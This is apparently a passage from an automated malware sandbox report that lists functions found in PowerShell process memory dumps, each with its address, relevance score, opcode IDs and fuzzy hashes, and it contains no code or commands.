                                                                            • API String ID:
                                                                            • Opcode ID: 9e587cc9506b3c7faa411733a7a13766530da8dec27346b67a8ab0df7f2017c4
                                                                            • Instruction ID: 398a935b57e99574ef394409143f082f3cd3dc44c15ef12b93cb2a3196637716
                                                                            • Opcode Fuzzy Hash: 9e587cc9506b3c7faa411733a7a13766530da8dec27346b67a8ab0df7f2017c4
                                                                            • Instruction Fuzzy Hash: B231263190EB8C4FDB59DBA898496E97FE0EF66321F0481AFC049D7173DA64580ACB52
                                                                            Function 00007FFD9B7E33B5 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1986104067.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd9b7e0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                            • Instruction ID: 347eb46863d0610c54c5e9c05e70889870b2352b4ba84a369cc0dc72dc0b729b
                                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                            • Instruction Fuzzy Hash: 6D01A73020CB0C4FD748EF0CE051AA5B3E0FF85320F10056DE58AC36A1DA32E882CB41
                                                                            Function 00007FFD9B7EA0FB Relevance: .0, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1986104067.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd9b7e0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dbafd36f3778d3ff7cefcbaca74cd8c00715efbd7be4a8119eef65381087f0fa
                                                                            • Instruction ID: 8a03af4bd6c28c8867f227479bec79e764b5a20482b4e099b587bfbbf265c0a9
                                                                            • Opcode Fuzzy Hash: dbafd36f3778d3ff7cefcbaca74cd8c00715efbd7be4a8119eef65381087f0fa
                                                                            • Instruction Fuzzy Hash: 35F0F636619B8C4FCB51DF2C98690E47FA0FF65211B0602ABE449C7031DB714A48C782
                                                                            Function 00007FFD9B8B414D Relevance: .0, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1987073385.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd9b8b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7cb27c4057229fc1280d71835ff87766860d03239fbfff835ee1cb3b120689c3
                                                                            • Instruction ID: 45f727684bbff9c08885b553b76059f1f5d5e5fbe09de2be86d757c7d2526ec6
                                                                            • Opcode Fuzzy Hash: 7cb27c4057229fc1280d71835ff87766860d03239fbfff835ee1cb3b120689c3
                                                                            • Instruction Fuzzy Hash: 71F09032B0D5094FD769EB5CE45289473E0EF5932071500BAE05DC71B3CA25FC418B80
                                                                            Function 00007FFD9B8B4400 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1987073385.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd9b8b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9fdb2fed7287e0136fd8ceda479f77dfc4410e27484cf91c6b8ffe81fe7e8234
                                                                            • Instruction ID: e13dfbe3731bcb1fa93003efd43073e22d24a15134943cb98bd17b73e3e3309f
                                                                            • Opcode Fuzzy Hash: 9fdb2fed7287e0136fd8ceda479f77dfc4410e27484cf91c6b8ffe81fe7e8234
                                                                            • Instruction Fuzzy Hash: B8F0BE32B0E5498FDB68EB5CE0618A873E0FF0932070600BAE05DCB0B3DA25BC50CB90
                                                                            Function 00007FFD9B8B41D1 Relevance: .0, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1987073385.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd9b8b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                            • Instruction ID: 75cc591d56b865421418cb4d1dbd5b20a6320eafc3c2957c2b4834ee9d9d0646
                                                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                            • Instruction Fuzzy Hash: B1E01A31B0C8188FDA78DB4CE0529A973E1EB9832171601BBD14EC7572CA22ED518BC0

                                                                            Non-executed Functions

                                                                            Function 00007FFD9B7E8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1986104067.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd9b7e0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                            • API String ID: 0-962139525
                                                                            • Opcode ID: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                                            • Instruction ID: b114a5ea51b1871e90ed1c4dc2c7250fd3b437a7b478e6d328b580f01d32eadd
                                                                            • Opcode Fuzzy Hash: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                                            • Instruction Fuzzy Hash: BC210477B045658AC30676ACB8559DC7790DF9437A39643F3E029CF193ED18A48B8A80

                                                                            Executed Functions

                                                                            Function 00007FFD9B8D30E9 Relevance: .7, Instructions: 662COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2163040306.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b8d0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 74242a3ef294f9b8e24a26e8bb942c3429536b811c513a70c79026a3c9be3e33
                                                                            • Instruction ID: 03615f2c2a9c18219d5604a496b54b7e0972cf37f55c1a0574d2ad041f521a7a
                                                                            • Opcode Fuzzy Hash: 74242a3ef294f9b8e24a26e8bb942c3429536b811c513a70c79026a3c9be3e33
                                                                            • Instruction Fuzzy Hash: 64122B22B0EBCA0FE7A69B6858655707BE1DFDA220B0A03FBD449C71E3DD19AD05C351
                                                                            Function 00007FFD9B80644D Relevance: .7, Instructions: 717COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2161897459.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b800000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 84b2a4b671021795bd69c52d83ef7620b8a43a3a3f61ecfc36342ef5deb3e295
                                                                            • Instruction ID: 96e82bc80a541169396669916723ddaf68569ea1ec101214746dd44ed9e370e9
                                                                            • Opcode Fuzzy Hash: 84b2a4b671021795bd69c52d83ef7620b8a43a3a3f61ecfc36342ef5deb3e295
                                                                            • Instruction Fuzzy Hash: D8D1A170A08A4D8FDF94EF58C465AED7BE1FF68340F1541AAD44DD72A6CA34E841CB81
                                                                            Function 00007FFD9B8D6605 Relevance: .4, Instructions: 440COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2163040306.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b8d0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9db00539c41671b27e9a6bb9c9f382e45a8d8cfda554226f3c7bf6abf1c77347
                                                                            • Instruction ID: 83084f25c1df349313695307995325ab341fed8466cd87c62c1536be81221cee
                                                                            • Opcode Fuzzy Hash: 9db00539c41671b27e9a6bb9c9f382e45a8d8cfda554226f3c7bf6abf1c77347
                                                                            • Instruction Fuzzy Hash: 82D13672B0FACE4FEB659B6888645A57BA0EF9A314B0903FFD45CC70E3D918A905C341
                                                                            Function 00007FFD9B8D3362 Relevance: .2, Instructions: 192COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2163040306.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b8d0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 938623fa0f3298688d6040b7a6af3c3fdfc020ef359b730f8611a385f2d40af9
                                                                            • Instruction ID: 1acf00a210d5042773d7b59168e5a77d243f2057804569afd744306b14a45fa0
                                                                            • Opcode Fuzzy Hash: 938623fa0f3298688d6040b7a6af3c3fdfc020ef359b730f8611a385f2d40af9
                                                                            • Instruction Fuzzy Hash: 2751EA22B0EA8A0FE7F69B68586457037D2DFE9350B0A03BBD44DC71A3DD19AD058341
                                                                            Function 00007FFD9B809FF4 Relevance: .2, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2161897459.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b800000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b6955288b672aec61cecba7570507ba9abf92efbe7b036b6e416fd263eadece3
                                                                            • Instruction ID: 72bb90e65c01599f81f1cae15edd07fa0bb660a13c4e68e19c4139949777cfc7
                                                                            • Opcode Fuzzy Hash: b6955288b672aec61cecba7570507ba9abf92efbe7b036b6e416fd263eadece3
                                                                            • Instruction Fuzzy Hash: BB414B37E0F69E5FFB21AB9CD8B64E43B60FF55769B0902B3C0D88A063ED1425868641
                                                                            Function 00007FFD9B809738 Relevance: .1, Instructions: 148COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2161897459.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b800000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 141b7de150663dbba2739ae016fea36092eb665d700d9c060f7d2c32f4d2942b
                                                                            • Instruction ID: 8a5b0e648a948fe02b7fafd6a36badb6e52c9663a9fd8cb15e617fb6668ecb0d
                                                                            • Opcode Fuzzy Hash: 141b7de150663dbba2739ae016fea36092eb665d700d9c060f7d2c32f4d2942b
                                                                            • Instruction Fuzzy Hash: 41410E72A0DB488FDB589F5C985A6F97BE0FF99310F40416FE489C3292DA20B945C7C2
                                                                            Function 00007FFD9B6EEB80 Relevance: .1, Instructions: 128COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2160783095.00007FFD9B6ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6ED000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b6ed000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4271d8014f99846e08cd0c1ec04a4e228c0c4d78010a17c84f964ab0258478df
                                                                            • Instruction ID: 5419693bda1c3834d8ff9e13721e49f08ddda7e03ff35606d67504f473bc4bb3
                                                                            • Opcode Fuzzy Hash: 4271d8014f99846e08cd0c1ec04a4e228c0c4d78010a17c84f964ab0258478df
                                                                            • Instruction Fuzzy Hash: 2C41267150EBC84FE7A68B2898559623FF0EF52220F1605DFD0D9CB1A3D625B806C792
                                                                            Function 00007FFD9B80A47C Relevance: .1, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2161897459.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b800000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8cca5e1bfcd223ab8bafb25098b2f170689bf6c543d74815a5310366e5bf2a61
                                                                            • Instruction ID: f615067ac0e34bc0f5e5ed0b370680db236d6137dda962a4e7bfb23ecd44f1b2
                                                                            • Opcode Fuzzy Hash: 8cca5e1bfcd223ab8bafb25098b2f170689bf6c543d74815a5310366e5bf2a61
                                                                            • Instruction Fuzzy Hash: F3213C3190CB4C4FDB59DFAC984A7E97BF0EF9A321F04426BD048C3152DA74941ACB91
                                                                            Function 00007FFD9B803428 Relevance: .1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2161897459.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b800000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 839376d279a2eeb710a260c876ee20f650038d5711cda006171492c3c64dbd81
                                                                            • Instruction ID: 51287e08e1661a3360a38f69b6e8da8b9e3696eb676e3d03550c55c3a626026b
                                                                            • Opcode Fuzzy Hash: 839376d279a2eeb710a260c876ee20f650038d5711cda006171492c3c64dbd81
                                                                            • Instruction Fuzzy Hash: 5A018F3250E7864FE3168B68A8A24A07FB0DF4327070942EBD0C5CA4A3D526588BC751
                                                                            Function 00007FFD9B8033B5 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2161897459.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b800000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                            • Instruction ID: 2b13d53e025c2be8e90647bd55e6abaa926a26a99d8691448afac0a98a8ed019
                                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                            • Instruction Fuzzy Hash: A001A73021CB0D4FD748EF0CE051AA6B3E0FF89360F10056DE58AC36A1DA32E882CB41
                                                                            Function 00007FFD9B8D414D Relevance: .0, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2163040306.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b8d0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 161abeb6e3318ad57e9fa0f034802e77b72030f9712c5fc4a78445656120bd06
                                                                            • Instruction ID: 852e09b503f7cafe576d46e44c4e482d4542c2c19ec0f5c61b0c88c15c5152cd
                                                                            • Opcode Fuzzy Hash: 161abeb6e3318ad57e9fa0f034802e77b72030f9712c5fc4a78445656120bd06
                                                                            • Instruction Fuzzy Hash: 29F03032B0D5494FDB69EB5CE45189473E0EF5932071501BBE15DC75B7DA25EC418740
                                                                            Function 00007FFD9B8D4400 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2163040306.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b8d0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2711cc547a0f3e10ed74aaffe8697aa356eb16ea2ccd0c34e6521d5f753acce4
                                                                            • Instruction ID: aeb6ad275be88915c621c30cb5cfb75d02bacb4ce1c6fa72bcce76823db70a3e
                                                                            • Opcode Fuzzy Hash: 2711cc547a0f3e10ed74aaffe8697aa356eb16ea2ccd0c34e6521d5f753acce4
                                                                            • Instruction Fuzzy Hash: 81F0BE32B0E5498FDB64EB4CE0648A873E0FF4932070601BBE05DCB0A3DA25BC80C790
                                                                            Function 00007FFD9B8D41D1 Relevance: .0, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2163040306.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b8d0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                            • Instruction ID: 7088ed3d6d6b9d5ea87a478394cc45f134a04600c237e2e00915a735f27c0c4b
                                                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                            • Instruction Fuzzy Hash: 07E01A31B0C8089FDB78DB4CE0519A973E1EB98331B1602BBD14EC7571CA22ED518B80

                                                                            Non-executed Functions

                                                                            Function 00007FFD9B808BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2161897459.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b800000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: K_^4$K_^7$K_^F$K_^J
                                                                            • API String ID: 0-377281160
                                                                            • Opcode ID: 3a0129d9073d28574ef41f57c119285f9db9755330e4a3708e73f9ebeeba15b4
                                                                            • Instruction ID: 9d309066f7feec984ecd3bd4730bca1830a416a0825308ca437a89f333535588
                                                                            • Opcode Fuzzy Hash: 3a0129d9073d28574ef41f57c119285f9db9755330e4a3708e73f9ebeeba15b4
                                                                            • Instruction Fuzzy Hash: AE21297BB085655ED705BB7CB8189DD3BA0CF9827935642F3D0A9CB093ED14708786C0

                                                                            Executed Functions

                                                                            Function 00007FFD9B8B660A Relevance: .4, Instructions: 445COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2396657061.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffd9b8b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dfe9b7a75cbedc424ca73b3a7ba1ddd417b909be922a90054d383cb3ff4ede1e
                                                                            • Instruction ID: 8386e5516645520e8a135acbac1c2c1581b82f174f07d35684b0865b82d6cb82
                                                                            • Opcode Fuzzy Hash: dfe9b7a75cbedc424ca73b3a7ba1ddd417b909be922a90054d383cb3ff4ede1e
                                                                            • Instruction Fuzzy Hash: 2ED147B2B0FA9E4FEB659B7848655B5BBA0EF1A314B0901FED45CC70E3D918E8058781
                                                                            Function 00007FFD9B7EA828 Relevance: .2, Instructions: 191COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2395303544.00007FFD9B7E9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E9000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffd9b7e9000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: df5c198132bf24696efd70c3cff9f324dce98eb1093af38034f82ab60e0ae55d
                                                                            • Instruction ID: b1002db72875d9208dc26909f2d9f97168576de115fafe91383eb26f8b9da87d
                                                                            • Opcode Fuzzy Hash: df5c198132bf24696efd70c3cff9f324dce98eb1093af38034f82ab60e0ae55d
                                                                            • Instruction Fuzzy Hash: 5151393060D7894FD71ADF68C8E58A47BE0EF56318B1502BED49AC71B7EE29A843C711
                                                                            Function 00007FFD9B7E9750 Relevance: .1, Instructions: 145COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2395303544.00007FFD9B7E9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E9000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffd9b7e9000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d3c943c562dc4cabc1a027a9492af53e5756c470701f53093f2e72dfe67e59cf
                                                                            • Instruction ID: 640760a90d2578d9ebae420f5be9276173afc34e531d1d7709dc602bafaff978
                                                                            • Opcode Fuzzy Hash: d3c943c562dc4cabc1a027a9492af53e5756c470701f53093f2e72dfe67e59cf
                                                                            • Instruction Fuzzy Hash: CB41297290DB884FDB189F5C9C1A6B9BBE0FB55310F04426FE059D32A2DA70A915CBC2
                                                                            Function 00007FFD9B6CEAA8 Relevance: .1, Instructions: 122COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2393745331.00007FFD9B6CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6CD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffd9b6cd000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 010610cc57cd783e7c727d9d0842f66475d3e2008eb597a036e40730ffd0fca9
                                                                            • Instruction ID: 655726aac6137cff37d7764e2cc214f034e1e123573d9d51548f43a6cf84f40d
                                                                            • Opcode Fuzzy Hash: 010610cc57cd783e7c727d9d0842f66475d3e2008eb597a036e40730ffd0fca9
                                                                            • Instruction Fuzzy Hash: 0241F77150EBC44FD766AB3898559623FF0EF56220B1606DFE088CB1A3D625B846C7A2
                                                                            Function 00007FFD9B7EA73C Relevance: .1, Instructions: 119COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2395303544.00007FFD9B7E9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E9000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffd9b7e9000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9e587cc9506b3c7faa411733a7a13766530da8dec27346b67a8ab0df7f2017c4
                                                                            • Instruction ID: 398a935b57e99574ef394409143f082f3cd3dc44c15ef12b93cb2a3196637716
                                                                            • Opcode Fuzzy Hash: 9e587cc9506b3c7faa411733a7a13766530da8dec27346b67a8ab0df7f2017c4
                                                                            • Instruction Fuzzy Hash: B231263190EB8C4FDB59DBA898496E97FE0EF66321F0481AFC049D7173DA64580ACB52
                                                                            Function 00007FFD9B7E33B5 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2395303544.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffd9b7e0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                            • Instruction ID: 347eb46863d0610c54c5e9c05e70889870b2352b4ba84a369cc0dc72dc0b729b
                                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                            • Instruction Fuzzy Hash: 6D01A73020CB0C4FD748EF0CE051AA5B3E0FF85320F10056DE58AC36A1DA32E882CB41
                                                                            Function 00007FFD9B7EA0FB Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2395303544.00007FFD9B7E9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E9000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffd9b7e9000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a46d11ea4c2cb699461f0fefff229ccc2d8b96968aa19ef14156623a0410cb8c
                                                                            • Instruction ID: cc2d4707ec8aa88154a484da4a3458e5c2d380c3acde1348905bbdf52b503c42
                                                                            • Opcode Fuzzy Hash: a46d11ea4c2cb699461f0fefff229ccc2d8b96968aa19ef14156623a0410cb8c
                                                                            • Instruction Fuzzy Hash: 0EF0F031A4AA8C4FC701EF28A8650E4BFE0EE66211B0502EBE449C7171EB358A48CB81
                                                                            Function 00007FFD9B8B414D Relevance: .0, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2396657061.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffd9b8b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8d61e211b484e3819ee25442062fd3b0e587730d3c455283af6f0f3270ca274d
                                                                            • Instruction ID: 8c2287cd58e9cf499eff091b6980afee53b8168cf97d380755c1be2bf750200f
                                                                            • Opcode Fuzzy Hash: 8d61e211b484e3819ee25442062fd3b0e587730d3c455283af6f0f3270ca274d
                                                                            • Instruction Fuzzy Hash: E5F09A32B0E5098FDB68EB5CE4528A873E0EF5932071600BAE06DC71B3CA25FC408B80
                                                                            Function 00007FFD9B8B4400 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2396657061.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffd9b8b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a38347014c53e7b900e8d0ff22d939ecb6c8c65e1f7b3fc898b5cf875cd18784
                                                                            • Instruction ID: f7a38bf77408fc29d316c70e2d3655b5cd83304cb1fa8e604b65cf225f27d337
                                                                            • Opcode Fuzzy Hash: a38347014c53e7b900e8d0ff22d939ecb6c8c65e1f7b3fc898b5cf875cd18784
                                                                            • Instruction Fuzzy Hash: C9F0BE32A0E5498FDB68EB5CE0618A873E0FF0932070600BAE05DCB0B3DA25BC50CB80
                                                                            Function 00007FFD9B8B41D1 Relevance: .0, Instructions: 29COMMON
                                                                            Download Yara Rule
